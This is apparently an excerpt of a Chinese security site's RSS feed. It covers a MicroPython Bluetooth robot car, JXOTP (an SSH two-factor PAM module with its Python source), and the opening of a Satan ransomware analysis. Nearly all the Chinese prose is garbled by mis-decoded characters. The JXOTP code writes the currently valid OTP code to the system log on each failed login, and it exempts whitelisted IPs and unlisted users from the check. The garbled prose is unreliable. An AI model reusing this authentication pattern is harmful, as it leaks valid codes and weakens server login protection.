452<p style="text-align: justify;">以TPYBoard v102开呿¿ä¸ºä¸»æŽ§æ¿ï¼Œå°è½¦æ‰©å±•æ¿å…·æœ‰å››è·¯PWM调速电机ã€8ä¸ªå¯æŽ§LEDã€1个蜂鸣器ã€5路舵机接å£ã€1个è“牙接å£ã€1个PS2æ— çº¿æŽ¥å£ã€å¼•出TPYBoard v102开呿¿å…¨éƒ¨é’ˆè„šï¼Œå¯è£…载循迹模å—ã€è¶…声波模å—ã€æœºæ¢°æ‰‹è‡‚ã€çº¢å¤–接收头,兼容入门级电机和专业级电机,两节18650å•独供电。</p>
453<p> <img alt="TPYBoard之DIYä¸€ä¸ªæ— çº¿è£…ç”²å°è½¦" src="http://image.3001.net/images/20180719/15319687852.png!small" width="399" height="531.6462765957447"> </p>
454<h2>å…ã€<b>æºä»£ç </b><b></b></h2>
455<p>我们åªéœ€è¦æŠŠTPYBoard v102 æ’å°è½¦æ‰©å±•æ¿ä¸Šï¼ŒæŠŠè“ç‰™æ¨¡å—æ’上,把程åºå†™å…¥å°±è¡Œ,䏋颿˜¯main.pyæºç¨‹åº</p>
456</p>
457<pre><code><p># main.py -- put your code here!</p><p>from pyb import Pin</p><p>from pyb import UART</p><p> </p><p>N1 = Pin('Y1', Pin.OUT_PP)</p><p>N2 = Pin('Y2', Pin.OUT_PP)</p><p>N3 = Pin('Y3', Pin.OUT_PP)</p><p>N4 = Pin('Y4', Pin.OUT_PP)</p><p>N5 = Pin('Y6', Pin.OUT_PP)</p><p>N6 = Pin('Y7', Pin.OUT_PP)</p><p>N7 = Pin('Y8', Pin.OUT_PP)</p><p>N8 = Pin('Y9', Pin.OUT_PP)</p><p> </p><p>led_red=Pin('Y5', Pin.OUT_PP)</p><p>led_right=Pin('Y12', Pin.OUT_PP)</p><p>led_left=Pin('Y11', Pin.OUT_PP)</p><p> </p><p>led_red.value(1)</p><p>led_right.value(0)</p><p>led_left.value(0)</p><p> </p><p> </p><p>blue=UART(1,9600,timeout=100)</p><p> </p><p>def go(speed):</p><p> M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=(speed*200)+10000)</p><p> M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=0)</p><p> </p><p> M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=(speed*100)+5000)</p><p> M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=0)</p><p> </p><p> M3_0=pyb.Timer(1, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y6, pulse_width=(speed*220)+10000)</p><p> M3_1=pyb.Timer(1, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y7, pulse_width=0)</p><p> </p><p> M4_0=pyb.Timer(2, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y9, pulse_width=(speed*50)+5000)</p><p> M4_1=pyb.Timer(12, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y8, pulse_width=0)</p><p> </p><p> led_red.value(0)</p><p> </p><p>def back(speed):</p><p> M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=0)</p><p> M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=(speed*200)+10000)</p><p> </p><p> M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=0)</p><p> M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=(speed*100)+10000)</p><p> </p><p> M3_0=pyb.Timer(1, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y6, pulse_width=0)</p><p> M3_1=pyb.Timer(1, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y7, pulse_width=(speed*200)+10000)</p><p> </p><p> M4_0=pyb.Timer(2, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y9, pulse_width=0)</p><p> M4_1=pyb.Timer(12, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y8, pulse_width=(speed*100)+10000)</p><p> </p><p> led_red.value(1)</p><p> </p><p>def stop():</p><p> M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=0)</p><p> M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=0)</p><p> </p><p> M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=0)</p><p> M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=0)</p><p> </p><p> M3_0=pyb.Timer(1, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y6, pulse_width=0)</p><p> M3_1=pyb.Timer(1, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y7, pulse_width=0)</p><p> </p><p> M4_0=pyb.Timer(12, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y8, pulse_width=0)</p><p> M4_1=pyb.Timer(2, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y9, pulse_width=0)</p><p> led_right.value(0)</p><p> led_left.value(0)</p><p> led_red.value(1)</p><p> </p><p>def left(speed):</p><p> M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=(speed*30)+10000)</p><p> M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=0)</p><p> </p><p> M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=(speed*100)+10000)</p><p> M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=0)</p><p> </p><p> M3_0=pyb.Timer(1, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y6, pulse_width=(speed*30)+10000)</p><p> M3_1=pyb.Timer(1, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y7, pulse_width=0)</p><p> </p><p> M4_0=pyb.Timer(2, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y9, pulse_width=(speed*100)+10000)</p><p> M4_1=pyb.Timer(12, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y8, pulse_width=0)</p><p> led_right.value(1)</p><p> led_left.value(0)</p><p> </p><p>def right(speed):</p><p> M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=(speed*200)+20000)</p><p> M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=0)</p><p> </p><p> M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=(speed*200)+3000)</p><p> M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=0)</p><p> </p><p> M3_0=pyb.Timer(1, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y6, pulse_width=(speed*100)+20000)</p><p> M3_1=pyb.Timer(1, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y7, pulse_width=0)</p><p> </p><p> M4_0=pyb.Timer(2, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y9, pulse_width=(speed*100)+3000)</p><p> M4_1=pyb.Timer(12, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y8, pulse_width=0)</p><p> led_right.value(0)</p><p> led_left.value(1)</p><p> </p><p>while True:</p><p> if blue.any()>0:</p><p> data=blue.read().decode()</p><p> print(data)</p><p> if data.find('0')>-1:</p><p> stop()</p><p> if data.find('1')>-1:</p><p> pyb.LED(2).on()</p><p> pyb.LED(3).off()</p><p> pyb.LED(4).off()</p><p> go(5)</p><p> if data.find('2')>-1:</p><p> pyb.LED(2).off()</p><p> pyb.LED(3).on()</p><p> pyb.LED(4).off()</p><p> back(5)</p><p> if data.find('3')>-1:</p><p> pyb.LED(2).off()</p><p> pyb.LED(3).off()</p><p> pyb.LED(4).on()</p><p> left(5)</p><p> if data.find('4')>-1:</p><p> pyb.LED(2).off()</p><p> pyb.LED(3).off()</p><p> pyb.LED(4).on()</p><p> right(5)</p></code></pre>
458</p>
459<p>需è¦è‡ªå·±ç»„装å°è½¦ï¼Œç¡¬ä»¶æŽ¥çº¿ä¸éœ€è¦æŽ¥ï¼Œåªéœ€è¦å°†å•片机和è“ç‰™æ¨¡å—æ’到扩展æ¿ä¸Šï¼Œç„¶åŽæŠŠç¨‹åºå¤åˆ¶åˆ°main.pyä¸ï¼Œç„¶åŽæ‰‹æœºä¸‹è½½å¥½app,就å¯ä»¥æŽ§åˆ¶å°è½¦çˆ¬å¡ï¼Œå‰è¿›ï¼ŒåŽé€€äº†ï¼ŒåŠ¨æ‰‹é€ èµ·æ¥å§ï¼ï¼ï¼ï¼ </p>
460<p><b style="color: rgb(159, 163, 168);">*本文作者:_æ©™å ã‚,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
461]]></content:encoded>
462 <wfw:commentRss>http://www.freebuf.com/geek/178005.html/feed</wfw:commentRss>
463 <slash:comments>1</slash:comments>
464 </item>
465 <item>
466 <title>å¼€æºSSHåŒå› ç´ ç™»é™†è®¤è¯ç³»ç»ŸJXOTP了解一下</title>
467 <link>http://www.freebuf.com/sectool/178161.html</link>
468 <comments>http://www.freebuf.com/sectool/178161.html#comments</comments>
469 <pubDate>Thu, 26 Jul 2018 01:00:27 +0000</pubDate>
470 <dc:creator>chenjc</dc:creator>
471 <category><![CDATA[工具]]></category>
472 <category><![CDATA[ssh]]></category>
473 <category><![CDATA[æš´åŠ›ç ´è§£]]></category>
474
475 <guid isPermaLink="false">http://www.freebuf.com/?p=178161</guid>
476 <description><![CDATA[一ã€å‰è¨€ 这就是个新的轮åï¼ŒæŠ€æœ¯ä¸Šæ²¡æœ‰å¤§çš„åˆ›æ–°ï¼Œåªæ˜¯æ›´å¥½ç”¨ä¸€äº›ã€‚SSHåŒå› ç´ è®¤è¯çš„å¼€æºæ–¹æ¡ˆæœ‰æŒºå¤šçš„,但是实践应用ä¸å‘çŽ°æœ‰ä¸‰ä¸ªé—®é¢˜ï¼Œè®©æŽ¨å¹¿çš„æƒ…å†µä¸æ˜¯å¾ˆå¥½ã€‚ 以google otp为例: 1ã€éœ€è¦å®‰è£…APP 2ã€éœ€è¦ä¿®æ”¹å®¢æˆ·ç«¯sshçš„ç™»é™†æ–¹å¼ 3ã€æ— 法集ä¸ç®¡ç† 第三点先ä¸è°ˆï¼Œå› 为跟用户没啥关系。å‰é¢ä¸¤ç‚¹å¯¹äºŽè¿ç»´äººå‘˜è¿˜å¥½è¯´ï¼Œä½†æ˜¯å¯¹äºŽå…¶ä»–的人æ¥è¯´å°±ä¸æ˜¯é‚£ä¹ˆå‹å¥½ï¼Œç‰¹åˆ«æ˜¯ç¬¬äºŒä¸ªæ¥éª¤å¼•起的问题就比较多,比如ä¸åŒè½¯ä»¶ä¸åŒçš„é…置方å¼ç‰ã€‚ 所以优化的æ€è·¯å°±æ˜¯å°½é‡é€æ˜ŽåŒ–,越方便越好。 JXOTPè®¡åˆ’æœ‰ä¸¤ä¸ªç‰ˆæœ¬ï¼Œä¸€ä¸ªæ˜¯å•æœºç‰ˆæœ¬ï¼Œä¸€ä¸ªæ˜¯ä¼ä¸šç‰ˆæœ¬ï¼Œé’ˆå¯¹çš„æ˜¯ä¸åŒçš„需求,目å‰å¼€æºçš„æ˜¯å•机版本,ä¼ä¸šç‰ˆæœ¬è¿˜åœ¨å†…测ä¸ï¼ŒåŽç»ä¼šæ”¾å‡ºã€‚ 啿œºç‰ˆæœ¬æ¯”è¾ƒé€‚åˆæœåŠ¡å™¨å°‘çš„æƒ…å†µï¼ŒåŒºåˆ†ç¨‹åº¦å¯ä»¥ç®€å•划为管ç†çš„æœåŠ¡å™¨æ˜¯å¦å¤šäºŽ10å°ï¼Œ10å°ä»¥å†…ï¼Œç‰¹åˆ«æ˜¯åªæœ‰å‡ å°æœåŠ¡å™¨çš„æƒ…å†µä¸‹ï¼Œç”¨å•æœºç‰ˆæœ¬æ˜¯ä¸ªä¸é”™çš„选择。 写这个JXOTP的背景是,云上的æœåŠ¡å™¨è¢«æ²¡å®Œæ²¡äº†çš„æ€¼ï¼Œæ¯æ—¶æ¯åˆ»éƒ½è¢«è¿›è¡ŒSSHæš´åŠ›ç ´è§£ï¼Œè™½è¯´å¯†ç æœ¬èº«ä¸å¼±ï¼Œä½†æ˜¯å“ªå¤©è¦æ˜¯è¢«æ’žåº“了也没地方说ç†åŽ»ï¼Œæ‰€ä»¥ä¿é™©èµ·è§è¿˜æ˜¯ä¸Šä¸ªåŒå› ç´ è®¤è¯ç³»ç»Ÿå¥½ã€‚ 二ã€éƒ¨ç½² ç›®å‰åœ¨centos6/7上测试通过,其他系统自测。 安装如下: 1ã€# git clone https://github.com/jx-sec/jxotp.git 2ã€# cd jxotp 3ã€# sh install_otp.sh 结果如下: æ‹¿å‡ºä½ å‘è´¢çš„å°æ‰‹ï¼Œæ‰“开微信å°ç¨‹åºï¼Œæœç´¢ “è¿ç»´å¯†ç ” ï¼Œæ‰“å¼€åŽ ç‚¹å‡» “æ·»åŠ åœºæ™¯” 扫æäºŒç»´ç å³å¯å®ŒæˆOTPçš„é…置。 æœ€åŽæ˜¯åœ¨æœåŠ¡å™¨ä¸Šå¯ç”¨OTP功能: # vi /etc/pam.d/sshd åœ¨æœ€ä¸Šä¸€è¡Œæ·»åŠ ï¼š auth optional pam_python.so auth.py ä¿å˜æ–‡ä»¶å³å¯ç”Ÿæ•ˆï¼Œæ— 需é‡å¯sshdæœåŠ¡ã€‚ 安装é…置过程到æ¤ç»“æŸï¼Œä¸‹é¢æ ¡éªŒæ•ˆæžœï¼š # tail -F /var/log/messages 新开个窗å£ç™»é™†æœåŠ¡å™¨ï¼Œéšä¾¿è¾“入个密ç ,如123456: 日志为”sshd: otp auth log: login user is root,login fail,code is 123456,must 054040″。 code is 123456,是å–当å‰è¾“入密ç çš„åŽå…ä½ï¼Œå³123456。 must is 054040, 054040是当å‰OTP生æˆçš„code,需è¦å¯¹æ¯”è¿ç»´å¯†ç ä¸çš„code与æœåŠ¡å™¨çš„code是å¦ä¸€è‡´ï¼Œæ£å¸¸æœåŠ¡å™¨æ—¶é—´æ²¡é—®é¢˜çš„è¯ï¼Œæ˜¯ä¸€è‡´çš„。 当确定æœåŠ¡å™¨å’Œè¿ç»´å¯†ç çš„code一致åŽï¼Œå®‰è£…å°±æ¤ç»“æŸã€‚ å‡è®¾å¯†ç 为abcdfgww,code为951753,那么当登陆的时候,输入的密ç 为abcdfgww951753。 三ã€ä»£ç åˆ†æž # -*- coding: utf-8 -*- import syslog import pyotp OTP_SECRET = "YOU OTP SECRET KEY" # å¯ä»¥æ‰‹åŠ¨ä¿®æ”¹SECRET KEY,必须为16ä½base32æ ¼å¼å—符串 WHITE_IP = ["YOU BYPASS IP"] #设置白åå•IP,白åå•IPå°†æ— éœ€è¿›è¡ŒåŠ¨æ€å£ä»¤è®¤è¯ï¼Œé€‚åˆæœ‰å ¡åž’机的场景,或者固定IP的情况 GLOBAL_USER_CHECK = False #开坿‰€æœ‰ç³»ç»Ÿç”¨æˆ·åŒå› ç´ è®¤è¯ï¼Œé»˜è®¤ä¸ºå¦ï¼Œå³åªé’ˆå¯¹ç‰¹å®šç”¨æˆ·å¼€å¯åŒå› ç´ è®¤è¯ CHECK_USER = […]]]></description>
477 <content:encoded><![CDATA[<h2>一ã€å‰è¨€</h2>
478<p><span style="color: rgb(0, 176, 80);"><b>这就是个新的轮åï¼ŒæŠ€æœ¯ä¸Šæ²¡æœ‰å¤§çš„åˆ›æ–°ï¼Œåªæ˜¯æ›´å¥½ç”¨ä¸€äº›ã€‚SSHåŒå› ç´ è®¤è¯çš„å¼€æºæ–¹æ¡ˆæœ‰æŒºå¤šçš„,但是实践应用ä¸å‘çŽ°æœ‰ä¸‰ä¸ªé—®é¢˜ï¼Œè®©æŽ¨å¹¿çš„æƒ…å†µä¸æ˜¯å¾ˆå¥½ã€‚</b></span></p>
479<p>以google otp为例:</p>
480<p>1ã€éœ€è¦å®‰è£…APP</p>
481<p>2ã€éœ€è¦ä¿®æ”¹å®¢æˆ·ç«¯ssh的登陆方å¼</p>
482<p>3ã€æ— 法集ä¸ç®¡ç†</p>
483<p>第三点先ä¸è°ˆï¼Œå› 为跟用户没啥关系。å‰é¢ä¸¤ç‚¹å¯¹äºŽè¿ç»´äººå‘˜è¿˜å¥½è¯´ï¼Œä½†æ˜¯å¯¹äºŽå…¶ä»–的人æ¥è¯´å°±ä¸æ˜¯é‚£ä¹ˆå‹å¥½ï¼Œç‰¹åˆ«æ˜¯ç¬¬äºŒä¸ªæ¥éª¤å¼•起的问题就比较多,比如ä¸åŒè½¯ä»¶ä¸åŒçš„é…置方å¼ç‰ã€‚</p>
484<p>所以优化的æ€è·¯å°±æ˜¯å°½é‡é€æ˜ŽåŒ–,越方便越好。</p>
485<p>JXOTPè®¡åˆ’æœ‰ä¸¤ä¸ªç‰ˆæœ¬ï¼Œä¸€ä¸ªæ˜¯å•æœºç‰ˆæœ¬ï¼Œä¸€ä¸ªæ˜¯ä¼ä¸šç‰ˆæœ¬ï¼Œé’ˆå¯¹çš„æ˜¯ä¸åŒçš„需求,目å‰å¼€æºçš„æ˜¯å•机版本,ä¼ä¸šç‰ˆæœ¬è¿˜åœ¨å†…测ä¸ï¼ŒåŽç»ä¼šæ”¾å‡ºã€‚</p>
486<p>啿œºç‰ˆæœ¬æ¯”è¾ƒé€‚åˆæœåŠ¡å™¨å°‘çš„æƒ…å†µï¼ŒåŒºåˆ†ç¨‹åº¦å¯ä»¥ç®€å•划为管ç†çš„æœåŠ¡å™¨æ˜¯å¦å¤šäºŽ10å°ï¼Œ10å°ä»¥å†…ï¼Œç‰¹åˆ«æ˜¯åªæœ‰å‡ å°æœåŠ¡å™¨çš„æƒ…å†µä¸‹ï¼Œç”¨å•æœºç‰ˆæœ¬æ˜¯ä¸ªä¸é”™çš„选择。</p>
487<p>写这个JXOTP的背景是,云上的æœåŠ¡å™¨è¢«æ²¡å®Œæ²¡äº†çš„æ€¼ï¼Œæ¯æ—¶æ¯åˆ»éƒ½è¢«è¿›è¡ŒSSHæš´åŠ›ç ´è§£ï¼Œè™½è¯´å¯†ç æœ¬èº«ä¸å¼±ï¼Œä½†æ˜¯å“ªå¤©è¦æ˜¯è¢«æ’žåº“了也没地方说ç†åŽ»ï¼Œæ‰€ä»¥ä¿é™©èµ·è§è¿˜æ˜¯ä¸Šä¸ªåŒå› ç´ è®¤è¯ç³»ç»Ÿå¥½ã€‚</p>
488<h2>二ã€éƒ¨ç½²</h2>
489<p>ç›®å‰åœ¨centos6/7上测试通过,其他系统自测。</p>
490<p>安装如下:</p>
491<p>1ã€# git clone <a href="https://github.com/jx-sec/jxotp.git" ref="">https://github.com/jx-sec/jxotp.git</a></p>
492<p>2ã€# cd jxotp</p>
493<p>3ã€# sh install_otp.sh</p>
494<p>结果如下:</p>
495<p><img alt="clipboard.png" src="http://image.3001.net/images/20180719/15319897144140.png" width="690" height="429"></p>
496<p>æ‹¿å‡ºä½ å‘è´¢çš„å°æ‰‹ï¼Œæ‰“开微信å°ç¨‹åºï¼Œæœç´¢ “è¿ç»´å¯†ç ” ï¼Œæ‰“å¼€åŽ ç‚¹å‡» “æ·»åŠ åœºæ™¯” 扫æäºŒç»´ç å³å¯å®ŒæˆOTPçš„é…置。</p>
497<p>æœ€åŽæ˜¯åœ¨æœåŠ¡å™¨ä¸Šå¯ç”¨OTP功能:</p>
498<pre><code># vi /etc/pam.d/sshd </code></pre>
499<p>åœ¨æœ€ä¸Šä¸€è¡Œæ·»åŠ ï¼š</p>
500<pre><code>auth optional pam_python.so auth.py</code></pre>
501<p><img alt="clipboard.png" src="http://image.3001.net/images/20180719/15319897379551.png" width="652" height="342"></p>
502<p>ä¿å˜æ–‡ä»¶å³å¯ç”Ÿæ•ˆï¼Œæ— 需é‡å¯sshdæœåŠ¡ã€‚</p>
503<p> 安装é…置过程到æ¤ç»“æŸï¼Œä¸‹é¢æ ¡éªŒæ•ˆæžœï¼š</p>
504<pre><code># tail -F /var/log/messages</code></pre>
505<p>新开个窗å£ç™»é™†æœåŠ¡å™¨ï¼Œéšä¾¿è¾“入个密ç ,如123456:</p>
506<p><img alt="clipboard.png" src="http://image.3001.net/images/20180719/15319897615450.png" width="690" height="164"></p>
507<p>日志为”sshd: otp auth log: login user is root,login fail,code is 123456,must 054040″。</p>
508<p>code is 123456,是å–当å‰è¾“入密ç çš„åŽå…ä½ï¼Œå³123456。</p>
509<p>must is 054040, 054040是当å‰OTP生æˆçš„code,需è¦å¯¹æ¯”è¿ç»´å¯†ç ä¸çš„code与æœåŠ¡å™¨çš„code是å¦ä¸€è‡´ï¼Œæ£å¸¸æœåŠ¡å™¨æ—¶é—´æ²¡é—®é¢˜çš„è¯ï¼Œæ˜¯ä¸€è‡´çš„。</p>
510<p>当确定æœåŠ¡å™¨å’Œè¿ç»´å¯†ç çš„code一致åŽï¼Œå®‰è£…å°±æ¤ç»“æŸã€‚</p>
511<p>å‡è®¾å¯†ç 为abcdfgww,code为951753,那么当登陆的时候,输入的密ç 为abcdfgww951753。</p>
512<h2>三ã€ä»£ç 分æž</h2>
513<pre><code># -*- coding: utf-8 -*-
514import syslog
515import pyotp
516
517OTP_SECRET = "YOU OTP SECRET KEY"
518# å¯ä»¥æ‰‹åŠ¨ä¿®æ”¹SECRET KEY,必须为16ä½base32æ ¼å¼å—符串
519WHITE_IP = ["YOU BYPASS IP"]
520#设置白åå•IP,白åå•IPå°†æ— éœ€è¿›è¡ŒåŠ¨æ€å£ä»¤è®¤è¯ï¼Œé€‚åˆæœ‰å ¡åž’机的场景,或者固定IP的情况
521GLOBAL_USER_CHECK = False
522#开坿‰€æœ‰ç³»ç»Ÿç”¨æˆ·åŒå› ç´ è®¤è¯ï¼Œé»˜è®¤ä¸ºå¦ï¼Œå³åªé’ˆå¯¹ç‰¹å®šç”¨æˆ·å¼€å¯åŒå› ç´ è®¤è¯
523CHECK_USER = ['root']
524#当GLOBAL_USER_CHECK = False时生效,é…置需è¦è¿›è¡ŒåŒå› ç´ è®¤è¯çš„ç”¨æˆ·ï¼Œå¯æ·»åŠ å¤šä¸ªç”¨æˆ·ï¼Œé»˜è®¤åªå¯¹root用户开å¯åŒå› ç´ è®¤è¯
525def otp_auth(code):
526 totp = pyotp.TOTP(OTP_SECRET)
527 if totp.now() == code:
528 return True
529 else:
530 return False
531#进行OTPæ ¡éªŒ
532def otp_log(msg):
533 syslog.openlog(facility=syslog.LOG_AUTH)
534 syslog.syslog("otp auth log: "+msg)
535 syslog.closelog()
536#记录日志
537def otp_code():
538 totp = pyotp.TOTP(OTP_SECRET)
539 return totp.now()
540#获å–当剿—¶é—´çš„code
541def pam_sm_authenticate(pamh, flags, argv):
542 for white in WHITE_IP:
543 if pamh.rhost == white:
544 otp_log("white ip login,ip is "+pamh.rhost)
545 return pamh.PAM_SUCCESS
546#åˆ¤æ–æ˜¯å¦æœ‰ç™½åå•IP,有的è¯ç›´æŽ¥è¿”å›žéªŒè¯æˆåŠŸï¼Œæ— éœ€è¿›è¡ŒåŒå› ç´ è®¤è¯
547 if GLOBAL_USER_CHECK:
548#åˆ¤æ–æ˜¯å¦å¼€å¯åŒå› ç´ è®¤è¯
549 resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF,'Password:'))
550#获å–输入的密ç
551 code = resp.resp[-6:]
552#å–密ç åŽå…ä½
553 if otp_auth(code):
554 pamh.authtok = resp.resp[:-6]
555 otp_log("login user is "+pamh.user+",login success,code is "+resp.resp[-6:])
556 else:
557 pamh.authtok = ""
558 otp_log("login user is "+pamh.user+",login fail,code is "+ resp.resp[-6:]+",must "+otp_code())
559 return pamh.PAM_SUCCESS
560#判æ–密ç åŽå…ä½ä¸ŽæœåС噍code是å¦ä¸€è‡´ï¼Œå¦‚果是将密ç åŽå…ä½åˆ 除,é‡å†™å¯†ç 傿•°ï¼Œå¦‚æžœä¸æ˜¯å°†æ•´ä¸ªå¯†ç 傿•°è®¾ç½®ä¸ºç©º
561 else:
562 for user in CHECK_USER:
563
564 if pamh.user == user:
565 resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF,'Password:'))
566 code = resp.resp[-6:]
567 if otp_auth(code):
568 pamh.authtok = resp.resp[:-6]
569 otp_log("login user is "+pamh.user+",login success,code is "+resp.resp[-6:])
570 else:
571 pamh.authtok = ""
572 otp_log("login user is "+pamh.user+",login fail,code is "+ resp.resp[-6:]+",must "+otp_code())
573 else:
574 otp_log("user login otp check bypass,user is "+ pamh.user)
575 return pamh.PAM_SUCCESS
576#判æ–用户是å¦ä¸ºè®¾ç½®å¼€å¯æ ¡éªŒçš„ç”¨æˆ·ï¼Œä¸æ˜¯ç›´æŽ¥è¿”回æˆåŠŸï¼Œæ˜¯çš„è¯è¿›è¡Œæ£€æµ‹ï¼Œæµç¨‹åŒä¸Š
577
578def pam_sm_setcred(pamh, flags, argv):
579
580 return pamh.PAM_SUCCESS
581</code></pre>
582<h2>å››ã€æ€»ç»“ </h2>
583<p>æ–°è½®åæ›´å¥½ç”¨çš„地方主è¦ä½“现在,ä¸éœ€è¦åƒä¼ 统的方法去改sshdçš„é…置文件开å¯ChallengeResponseAuthentication选项,也å³å¯¹äºŽä½¿ç”¨çš„用户æ¥è¯´ï¼Œéƒ¨ç½²å®ŒåŽæ˜¯é€æ˜Žçš„ï¼Œæ— éœ€ä¿®æ”¹windows下登陆客户端的é…置,é™ä½Žä½¿ç”¨çš„æˆæœ¬ï¼Œå…¶æ¬¡æ”¯æŒç”¨æˆ·å’ŒIP设置,æé«˜äº†çµæ´»æ€§ï¼Œä½†æ˜¯ç›¸å¯¹ä¼ä¸šç‰ˆæ¥è¯´ï¼Œå•机版å˜åœ¨ä¸å¥½ç»´æŠ¤çš„问题,所以适åˆå°‘釿œåŠ¡å™¨ä½¿ç”¨ã€‚</p>
584<p><b style="color: rgb(159, 163, 168);">*本文作者chenjc,转载请注明æ¥è‡ªFreeBuf.COM。</b></p>
585]]></content:encoded>
586 <wfw:commentRss>http://www.freebuf.com/sectool/178161.html/feed</wfw:commentRss>
587 <slash:comments>0</slash:comments>
588 </item>
589 <item>
590 <title>è¯¦ç»†åˆ†æž | 全新“撒旦â€Satan勒索病毒æ¥è¢</title>
591 <link>http://www.freebuf.com/articles/system/178171.html</link>
592 <comments>http://www.freebuf.com/articles/system/178171.html#comments</comments>
593 <pubDate>Thu, 26 Jul 2018 00:30:07 +0000</pubDate>
594 <dc:creator>瑞星</dc:creator>
595 <category><![CDATA[系统安全]]></category>
596 <category><![CDATA[网络安全]]></category>
597 <category><![CDATA[勒索病毒]]></category>
598 <category><![CDATA[æ’’æ—¦]]></category>
599
600 <guid isPermaLink="false">http://www.freebuf.com/?p=178171</guid>
601 <description><![CDATA[近日,瑞星å¨èƒæƒ…报平å°å‘现多起国内用户感染“撒旦â€Satan勒索病毒事件。æ®ç‘žæ˜Ÿå®‰å…¨ç ”究人员介ç»ï¼Œè¯¥ç—…毒è¿è¡ŒåŽä¼šåР坆å—å®³è€…è®¡ç®—æœºæ–‡ä»¶ï¼ŒåŠ å¯†å®ŒæˆåŽä¼šç”¨ä¸è‹±éŸ©ä¸‰å›½è¯è¨€ç´¢å–1个比特å¸ä½œä¸ºèµŽé‡‘,并å¨èƒä¸‰å¤©å†…䏿”¯ä»˜å°†ä¸äºˆè§£å¯†ã€‚与以往常è§çš„勒索病毒ä¸åŒï¼Œâ€œæ’’æ—¦â€ä¸ä»…ä¼šå¯¹æ„ŸæŸ“ç—…æ¯’çš„ç”µè„‘ä¸‹æ‰‹ï¼ŒåŒæ—¶ç—…æ¯’è¿˜ä¼šåˆ©ç”¨å¤šä¸ªæ¼æ´žç»§ç»æ”»å‡»å…¶å®ƒç”µè„‘。 图:感染“撒旦â€ç—…毒åŽå¼¹å‡ºçš„å‹’ç´¢çª—å£ ç‘žæ˜Ÿå®‰å…¨ç ”ç©¶äººå‘˜å¯¹æœ€æ–°ç‰ˆæœ¬çš„â€œæ’’æ—¦â€Satan勒索病毒进行了分æžï¼Œå‘现该病毒与以往勒索病毒有较大的ä¸åŒï¼Œâ€œæ’’æ—¦â€Satan勒索病毒ä¸ä»…使用永æ’ä¹‹è“æ¼æ´žæ”»å‡»ï¼Œè¿˜å¢žåŠ äº†å…¶å®ƒçš„æ¼æ´žæ”»å‡»ã€‚åŒ…æ‹¬æ–‡ä»¶ä¸Šä¼ æ¼æ´žã€tomcatå¼±å£ä»¤æ¼æ´žã€WebLogic WLSç»„ä»¶æ¼æ´žã€JBOOS ååºåˆ—åŒ–æ¼æ´žç‰ã€‚ 